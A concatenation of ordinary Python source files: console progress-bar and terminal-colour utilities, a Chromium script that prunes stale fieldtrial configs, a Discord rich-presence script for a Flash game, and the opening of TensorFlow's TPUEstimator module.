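    print("demo response:", hex(_demo_cmd["response"]))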
|
ConsoleUtils.py
|
import io
import logging
import shutil
import sys
import threading
import time
from enum import Enum
from typing import Callable, Iterable, Union, Sized, Optional
from .LoggerUtils import temp_log
__all__ = ['Progress', 'GetInput', 'count_ordinal', 'TerminalStyle']
# noinspection SpellCheckingInspection
class TerminalStyle(Enum):
CEND = '\33[0m'
CBOLD = '\33[1m'
CITALIC = '\33[3m'
CURL = '\33[4m'
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
CSELECTED = '\33[7m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
CBLACKBG = '\33[40m'
CREDBG = '\33[41m'
CGREENBG = '\33[42m'
CYELLOWBG = '\33[43m'
CBLUEBG = '\33[44m'
CVIOLETBG = '\33[45m'
CBEIGEBG = '\33[46m'
CWHITEBG = '\33[47m'
CGREY = '\33[90m'
CRED2 = '\33[91m'
CGREEN2 = '\33[92m'
CYELLOW2 = '\33[93m'
CBLUE2 = '\33[94m'
CVIOLET2 = '\33[95m'
CBEIGE2 = '\33[96m'
CWHITE2 = '\33[97m'
CGREYBG = '\33[100m'
CREDBG2 = '\33[101m'
CGREENBG2 = '\33[102m'
CYELLOWBG2 = '\33[103m'
CBLUEBG2 = '\33[104m'
CVIOLETBG2 = '\33[105m'
CBEIGEBG2 = '\33[106m'
CWHITEBG2 = '\33[107m'
@staticmethod
def color_table():
"""
prints table of formatted text format options
"""
for style in range(8):
for fg in range(30, 38):
s1 = ''
for bg in range(40, 48):
_format = ';'.join([str(style), str(fg), str(bg)])
s1 += '\x1b[%sm %s \x1b[0m' % (_format, _format)
print(s1)
print('\n')
class Progress(object):
DEFAULT = '{prompt} [{bar}] {progress:>7.2%} {eta}{done}'
MINI = '{prompt} {progress:.2%}'
FULL = '{prompt} [{bar}] {done_tasks}/{total_tasks} {progress:>7.2%}, {remaining} to go {eta}{done}'
def __init__(self, tasks: Union[int, Iterable], prompt: str = 'Progress:', format_spec: str = DEFAULT, **kwargs):
self.prompt = prompt
self.format_spec = format_spec
self._width = kwargs.pop('width', None)
self.tick_size = kwargs.pop('tick_size', 0.0001)
self.progress_symbol = kwargs.pop('progress_symbol', '=')
self.blank_symbol = kwargs.pop('blank_symbol', ' ')
if isinstance(tasks, int):
self.total_tasks = tasks
self.tasks = range(self.total_tasks)
elif isinstance(tasks, (Sized, Iterable)):
self.total_tasks = len(tasks)
self.tasks = tasks
if 'outputs' not in kwargs:
self.outputs = [sys.stdout]
else:
outputs = kwargs.pop('outputs')
if outputs is None:
self.outputs = []
elif isinstance(outputs, Iterable):
self.outputs = outputs
else:
self.outputs = [outputs]
self.start_time = time.time()
self.done_tasks = 0
self.done_time = None
self.iter_task = None
self.last_output = -1
@property
def eta(self):
remaining = self.total_tasks - self.done_tasks
time_cost = time.time() - self.start_time
if self.done_tasks == 0:
eta = float('inf')
else:
eta = time_cost / self.done_tasks * remaining
return eta
@property
def work_time(self):
if self.done_time:
work_time = self.done_time - self.start_time
else:
work_time = time.time() - self.start_time
return work_time
@property
def is_done(self):
return self.done_tasks == self.total_tasks
@property
def progress(self):
return self.done_tasks / self.total_tasks
@property
def remaining(self):
return self.total_tasks - self.done_tasks
@property
def width(self):
if self._width:
width = self._width
else:
width = shutil.get_terminal_size().columns
return width
def format_progress(self):
if self.is_done:
eta = ''
done = f'All done in {self.work_time:,.2f} seconds'
else:
eta = f'ETA: {self.eta:,.2f} seconds'
done = ''
args = {
'total_tasks': self.total_tasks,
'done_tasks': self.done_tasks,
'progress': self.progress,
'remaining': self.remaining,
'work_time': self.work_time,
'eta': eta,
'done': done,
'prompt': self.prompt,
'bar': '',
}
bar_size = max(10, self.width - len(self.format_spec.format_map(args)))
progress_size = round(bar_size * self.progress)
args['bar'] = self.progress_symbol * progress_size + self.blank_symbol * (bar_size - progress_size)
progress_str = self.format_spec.format_map(args)
return progress_str
def reset(self):
self.done_tasks = 0
self.done_time = None
self.last_output = -1
def output(self):
progress_str = self.format_progress()
self.last_output = self.progress
for output in self.outputs:
if isinstance(output, Callable):
output(progress_str)
elif isinstance(output, logging.Logger):
temp_log(logger=output, level=logging.INFO, msg=progress_str)
            elif isinstance(output, io.TextIOBase):
print('\r' + progress_str, file=output, end='')
else:
pass
def __call__(self, *args, **kwargs):
return self.format_progress()
def __next__(self):
try:
if (not self.tick_size) or self.progress >= self.tick_size + self.last_output:
self.output()
self.done_tasks += 1
return self.iter_task.__next__()
except StopIteration:
self.done_tasks = self.total_tasks
self.output()
raise StopIteration()
def __iter__(self):
self.reset()
self.start_time = time.time()
self.iter_task = self.tasks.__iter__()
return self
class GetInput(object):
def __init__(self, timeout=5, prompt_message: Optional[str] = None, default_value: Optional[str] = None):
if prompt_message is None:
prompt_message = f'Please respond in {timeout} seconds: '
self.timeout = timeout
self.default_value = default_value
self.prompt_message = prompt_message
self._input = None
self.input_thread: Optional[threading.Thread] = None
self.show()
def show(self):
self.input_thread = threading.Thread(target=self.get_input)
self.input_thread.daemon = True
self.input_thread.start()
self.input_thread.join(timeout=self.timeout)
# input_thread.terminate()
if self._input is None:
print(f"No input was given within {self.timeout} seconds. Use {self.default_value} as default value.")
self._input = self.default_value
def get_input(self):
self._input = None
self._input = input(self.prompt_message)
return
@property
def input(self):
return self._input
def count_ordinal(n: int) -> str:
"""
Convert an integer into its ordinal representation::
        count_ordinal(0) => '0th'
        count_ordinal(3) => '3rd'
        count_ordinal(122) => '122nd'
        count_ordinal(213) => '213th'
"""
n = int(n)
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return str(n) + suffix
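# Minimal usage sketch (illustrative, not part of the module API): wrap an
# iterable in Progress for a live progress bar, and format ranks with
# count_ordinal. The task count and sleep below are placeholders.
if __name__ == '__main__':
    for _ in Progress(range(50), prompt='Demo:'):
        time.sleep(0.01)
    print()
    print(', '.join(count_ordinal(i) for i in (1, 2, 3, 11, 22)))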
|
cleanup_stale_fieldtrial_configs.py
|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple script for cleaning up stale configs from fieldtrial_testing_config.
Methodology:
Scan for all study names that appear in fieldtrial config file,
and removes ones that don't appear anywhere in the codebase.
The script ignores WebRTC entries as those often lead to false positives.
Usage:
vpython tools/variations/cleanup_stale_fieldtrial_configs.py
Run with --help to get a complete list of options this script runs with.
If this script removes features that appear to be used in the codebase,
double-check the study or feature name for typos or case differences.
"""
from __future__ import print_function
import json
import optparse
import os
import subprocess
import sys
import threading
CONFIG_PATH = 'testing/variations/fieldtrial_testing_config.json'
PRESUBMIT_SCRIPT = 'testing/variations/PRESUBMIT.py'
THREAD_COUNT = 16
_LITERAL_CACHE = {}
def is_literal_used(literal):
"""Check if a given string literal is used in the codebase."""
if literal in _LITERAL_CACHE:
return _LITERAL_CACHE[literal]
git_grep_cmd = ('git', 'grep', '--threads', '2', '-l', '\"%s\"' % literal)
git_grep_proc = subprocess.Popen(git_grep_cmd, stdout=subprocess.PIPE)
# Check for >1 since fieldtrial_testing_config.json will always be a result.
if len(git_grep_proc.stdout.read().splitlines()) > 1:
_LITERAL_CACHE[literal] = True
return True
  # Fall back to a shell pipeline over generated .h/.cc files under out/,
  # build/ or gen/ directories.
  bash_find_cmd = ('bash', '-c',
                   ('find . -type f | grep -E "\\.(h|cc)$" | '
                    'grep -E "(/out/|/build/|/gen/)" | '
                    'xargs grep -l "\\"%s\\""') % literal)
bash_find_proc = subprocess.Popen(bash_find_cmd, stdout=subprocess.PIPE)
used = len(bash_find_proc.stdout.read().splitlines()) > 0
_LITERAL_CACHE[literal] = used
if not used:
print('Did not find', repr(literal))
return used
def is_study_used(study_name, configs):
"""Checks if a given study is used in the codebase."""
if study_name.startswith('WebRTC-'):
return True # Skip webrtc studies which give false positives.
if is_literal_used(study_name):
return True
for config in configs:
for experiment in config.get('experiments', []):
for feature in experiment.get('enable_features', []):
if is_literal_used(feature):
return True
for feature in experiment.get('disable_features', []):
if is_literal_used(feature):
return True
return False
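# Example of what gets checked for a single study entry (illustrative; the
# study and feature names below are made up):
#
#   "MyStudy": [{"platforms": ["windows"],
#                "experiments": [{"name": "Enabled",
#                                 "enable_features": ["MyFeature"]}]}]
#
# is_study_used() looks for the quoted literals "MyStudy" and "MyFeature" in
# the codebase and keeps the entry if either is found.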
def thread_func(thread_limiter, studies_map, study_name, configs):
"""Runs a limited number of tasks and updates the map with the results.
Args:
    thread_limiter: A lock used to limit the number of active threads.
studies_map: The map where confirmed studies are added to.
study_name: The name of the study to check.
configs: The configs for the given study.
Side-effect:
    This function adds the study to |studies_map| if it is used.
"""
thread_limiter.acquire()
try:
if is_study_used(study_name, configs):
studies_map[study_name] = configs
finally:
thread_limiter.release()
def main():
parser = optparse.OptionParser()
parser.add_option('--input_path',
help='Path to the fieldtrial config file to clean.')
parser.add_option('--output_path',
help='Path to write cleaned up fieldtrial config file.')
parser.add_option('--thread_count',
type='int',
help='The number of threads to use for scanning.')
opts, _ = parser.parse_args()
input_path = os.path.expanduser(opts.input_path or CONFIG_PATH)
output_path = os.path.expanduser(opts.output_path or CONFIG_PATH)
thread_limiter = threading.BoundedSemaphore(opts.thread_count or THREAD_COUNT)
with open(input_path) as fin:
studies = json.load(fin)
print('Loaded config from', input_path)
threads = []
clean_studies = {}
for study_name, configs in studies.items():
args = (thread_limiter, clean_studies, study_name, configs)
threads.append(threading.Thread(target=thread_func, args=args))
# Start all threads, then join all threads.
for t in threads:
t.start()
for t in threads:
t.join()
with open(output_path, 'wt') as fout:
json.dump(clean_studies, fout)
print('Wrote cleaned config to', output_path)
# Run presubmit script to format config file.
retcode = subprocess.call(['vpython', PRESUBMIT_SCRIPT, output_path])
if retcode != 0:
print('Failed to format output, manually run:')
print('vpython', PRESUBMIT_SCRIPT, output_path)
if __name__ == '__main__':
sys.exit(main())
|
car.py
|
'''
MIT License
Copyright (c) 2021 ImPurpl3
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import miniamf.adapters._sets
import miniamf.amf3
import miniamf.amf0
import pypresence
from miniamf import sol
from pypresence import Presence
import time
import os
import threading
import pythoncom
import psutil
import argparse
parser = argparse.ArgumentParser(description='Discord RPC for Red Ball Hacks')
parser.add_argument('-s', '--sol', dest="solPass", default="rpc", help='Name of SOL to Load')
parser.add_argument('-i', '--appid', '--id', dest="idPass", default="881010245147709440", help='Discord App ID')
parser.add_argument('-x', '--max', dest="maxPass", default="9", help='Maximum # of Levels', type=int)
parser.add_argument('-m', '--min', dest="minPass", default="8", help='Minimum # of Levels', type=int)
args = parser.parse_args()
if args.solPass:
solArg = args.solPass
if args.idPass:
idArg = args.idPass
def onMin():
global isMin
isMin = True
def onMax():
global isMax
isMax = True
if args.maxPass:
maxArg = args.maxPass
if args.maxPass == 9:
isMax = False
else:
onMax()
if args.minPass:
minArg = args.minPass - 1
if args.minPass == 8:
isMin = False
else:
onMin()
print("Startup Initialized...")
rpc = Presence(idArg)
rpc.connect()
print(f"RPC Connected ({idArg})")
time.sleep(3)
predir = os.path.expandvars(r'%APPDATA%/Macromedia/Flash Player/#SharedObjects/')
postdir = os.listdir(predir)
posterdir = ''.join(postdir)
print(f'SO Folder Key is {posterdir}')
sendto_dir = predir + posterdir + "/localhost/" + solArg + ".sol"
flag = 0
if os.path.exists(sendto_dir) == True:
solLoad = sol.load(sendto_dir)
rpcSetSol = solLoad.get("setting")
print(f"SOL File found and Loaded ({args.solPass})")
SOLchk = True
else:
print(f"SOL File not found ({args.solPass})")
SOLchk = False
os.system('pause')
if SOLchk == True:
print("Searching for Flash...")
for p in psutil.process_iter(attrs=['pid', 'name']):
if p.info['name'] == "Flash Player.exe":
flag = 1
def checkFlash():
pythoncom.CoInitialize()
import subprocess
global flag
global rpcSetFlag
while flag == 1:
progs = str(subprocess.check_output('tasklist'))
if "Flash Player.exe" in progs:
flag = 1
else:
rpcSetFlag = True
flag = 0
th = threading.Thread(target=checkFlash, name='flashchk')
if flag == 1:
th.daemon = True
th.start()
print("Thread Started")
def updateRPC():
solLoad = sol.load(sendto_dir)
detailSol = solLoad.get("detail")
rpcSetSol = solLoad.get("setting")
global maxArg
global minArg
global isMax
global isMin
if isMax == True or isMin == True:
if rpcSetSol == "On":
minLvl = minArg
while minLvl < maxArg:
minLvl = minLvl + 1
if detailSol == "In menu":
rpc.update(details="In Menu", large_image="icon")
elif detailSol == f"Level {minLvl}":
rpc.update(state="On Level", party_size=[minLvl,maxArg], small_image=str(minArg), large_image="icon")
else:
print('RPC set to "Off" detected')
global rpcSetFlag
rpcSetFlag = True
os.system('pause')
else:
if rpcSetSol == "On":
if detailSol == "In menu":
rpc.update(details="In Menu", large_image="car_icon")
elif detailSol == "Level 8":
rpc.update(state="On Level", party_size=[8,9], small_image="8", large_image="car_icon")
elif detailSol == "Level 9":
rpc.update(state="On Level", party_size=[9,9], small_image="9", large_image="car_icon")
else:
print('RPC set to "Off" detected')
rpcSetFlag = True
os.system('pause')
rpcSetFlag = False
if flag == 1:
if rpcSetSol == "On":
print("RPC is Running")
while rpcSetFlag == False:
updateRPC()
time.sleep(1)
if flag == 0:
rpc.close()
print("Game Exit Detected")
th.join()
os.system('pause')
else:
if flag == 1:
            print('RPC set to "Off" in game so RPC was not run')
os.system('pause')
elif SOLchk == True:
    print("RPC not run because Flash Player was not found")
os.system('pause')
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import evaluation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
# Track the adoption of TPUEstimator
_tpu_estimator_gauge = tf.compat.v2.__internal__.monitoring.BoolGauge(
'/tensorflow/api/tpu_estimator',
'Whether the program uses tpu estimator or not.')
if ops.get_to_proto_function('{}_{}'.format(_TPU_ESTIMATOR,
_ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[
tf.compat.v1.GraphKeys.GLOBAL_VARIABLES,
tf.compat.v1.GraphKeys.GLOBAL_STEP
])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
  The purpose of using a variable, rather than a constant, is to allow
  TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
    RuntimeError: If multiple iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
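# Illustrative sketch (not part of TPUEstimator): the adaptive schedule described
# in the docstring of _create_or_get_iterations_per_loop can be reproduced as
# below; e.g. steps=10 with iterations_per_loop=4 yields [4, 4, 2].
def _example_iterations_per_loop_schedule(steps, iterations_per_loop):
  schedule = []
  remaining = steps
  while remaining > 0:
    schedule.append(min(iterations_per_loop, remaining))
    remaining -= schedule[-1]
  return schedule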
def _sync_variables_ops(ctx):
  """Create variable synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
  In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
  # Estimator evaluate increases the eval step by 1 by default, so we add the
  # difference.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
  TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
  update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
  the `eval_metrics`.
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
  works for train() and evaluate(). The Tensors returned by the function are
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError(
'All hooks must be SessionRunHook instances, given: {}'.format(
hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
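# Illustrative sketch (not part of this module): the `eval_metrics` tuple
# described in the TPUEstimatorSpec docstring pairs a CPU-side metric_fn with
# the Tensors shipped back from the TPU. Assuming batch-major `labels` and
# `logits` Tensors inside a model_fn:
#
#   def metric_fn(labels, logits):
#     predictions = tf.argmax(logits, axis=1)
#     return {'accuracy': tf.compat.v1.metrics.accuracy(labels, predictions)}
#
#   spec = TPUEstimatorSpec(mode=mode, loss=loss,
#                           eval_metrics=(metric_fn, [labels, logits]))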
class _OpQueueContext(object):
  """Manages work queue and thread for an infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name,
iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.',
self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
  """Manages work queue and thread for an infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
